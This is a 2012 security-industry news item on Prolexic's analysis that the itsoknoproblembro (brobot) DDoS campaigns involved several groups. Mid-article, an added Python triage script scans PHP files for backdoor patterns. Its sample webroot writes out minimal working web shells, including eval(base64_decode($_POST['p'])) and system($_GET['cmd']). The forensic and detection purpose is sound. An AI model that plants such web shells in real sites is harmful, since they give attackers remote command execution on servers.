Prolexic Technologies believes the recent spate of DDoS attacks should not be attributed to just one group/individual or toolkit, as has been widely assumed.
The bot toolkit found to be responsible for the majority of these attacks is a PHP-based suite known as itsoknoproblembro; the infected hosts are known as brobots. However, post-attack forensic analysis of a number of infected hosts by the Prolexic Security Engineering & Response Team (PLXsert) points to multiple malicious actors participating in the crippling DDoS attacks, each using their own toolkits and tactics. The PLXsert team found:
* Exploitation and defacement techniques varied. In some instances hosts were taken over and defaced. In others, files were dropped and scans were set up to identify additional targets. This leads PLXsert to believe that the initial infections were performed by multiple groups (or multiple individuals).
* Forensics showed that different toolkits were used to maintain or gain access to infected hosts.
* A blend of attack scripts and different techniques during each observed campaign points to the possibility of multiple, well-organized groups.
* PLXsert gained visibility into some machines and was able to show that infections persisted as far back as May 2012. The difficulty of cleanup is directly related to the number of different toolkits used and the high number of back doors installed. This supports PLXsert’s hypothesis that multiple groups/individuals used different tactics.
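The findings above rest on two kinds of evidence from each compromised host: how many distinct styles of back door are present, and how far back their file timestamps reach. The script below is an added illustration of that triage step and is not PLXsert's tooling or the article's own code. It walks a webroot, groups PHP files by generic backdoor marker families (the regexes are illustrative patterns chosen for this example, not signatures of itsoknoproblembro), and reports per family the file count and the earliest modification time as a persistence floor. The sample webroot it builds in a temporary directory is constructed for the demonstration, with mtimes set to mimic infections dating back to May 2012.

```python
import os
import re
import tempfile
from collections import defaultdict
from datetime import datetime, timezone

# Illustrative marker families for common PHP backdoor constructs. These are
# generic patterns chosen for this example, not signatures of itsoknoproblembro
# or of any other specific toolkit.
MARKER_FAMILIES = {
    "eval-of-decoded-payload": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "shell-exec-of-request-input": re.compile(
        r"(?:system|shell_exec|passthru|exec)\s*\(\s*\$_(?:GET|POST|REQUEST)\b", re.I),
}


def scan_webroot(root):
    """Walk `root` and return {family: [(relative_path, mtime_epoch), ...]} for
    every PHP file matching a marker family. A file may appear under several."""
    hits = defaultdict(list)
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    content = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep scanning the rest
            rel = os.path.relpath(path, root)
            mtime = os.stat(path).st_mtime
            for family, pattern in MARKER_FAMILIES.items():
                if pattern.search(content):
                    hits[family].append((rel, mtime))
    return dict(hits)


def summarize(hits):
    """Per family: number of files and the earliest mtime as a UTC date. The
    earliest mtime is a lower bound on how long that style of back door has
    been present (attackers can forge mtimes, so treat it as a floor, not proof)."""
    summary = {}
    for family, entries in hits.items():
        earliest = min(mtime for _, mtime in entries)
        summary[family] = {
            "count": len(entries),
            "earliest": datetime.fromtimestamp(earliest, tz=timezone.utc).date().isoformat(),
        }
    return summary


def build_sample_webroot():
    """Constructed sample webroot (not real evidence): one benign file and three
    back doors of two different styles, with mtimes set to mimic infections
    dating back to May 2012. Returns the directory path."""
    root = tempfile.mkdtemp(prefix="webroot-")

    def put(rel, content, when):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        stamp = datetime(*when, tzinfo=timezone.utc).timestamp()
        os.utime(path, (stamp, stamp))

    put("index.php", "<?php echo 'welcome'; ?>\n", (2012, 10, 1))
    put("images/.cache.php", "<?php eval(base64_decode($_POST['p'])); ?>\n", (2012, 5, 15))
    put("includes/.tmp.php", "<?php eval(gzinflate(base64_decode('AAAA'))); ?>\n", (2012, 6, 20))
    put("uploads/x.php", "<?php system($_GET['cmd']); ?>\n", (2012, 9, 1))
    return root


if __name__ == "__main__":
    for family, info in sorted(summarize(scan_webroot(build_sample_webroot())).items()):
        print(f"{family}: {info['count']} file(s), earliest {info['earliest']}")
```

On the constructed sample the report shows two marker families, one of them with two files and an earliest timestamp in May 2012: the same shape of evidence the PLXsert bullets describe, where several distinct back door styles on one host argue for more than one actor and the oldest timestamps bound the duration of the infection.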
“A blend of attack scripts and different techniques used in each campaign is another pointer to the likelihood that multiple, well-organized groups or individuals were behind these attacks,” said Stuart Scholly, president at Prolexic. “As we approach the critical online holiday shopping period, there is no doubt that attackers have armed themselves with advanced toolkits capable of generating amplified and sophisticated DDoS floods.”
Prolexic will issue its Q3 2012 Global DDoS Attack Report in mid-October. The report will include a detailed case study on the itsoknoproblembro toolkit as well as data from the recent high profile DDoS attacks.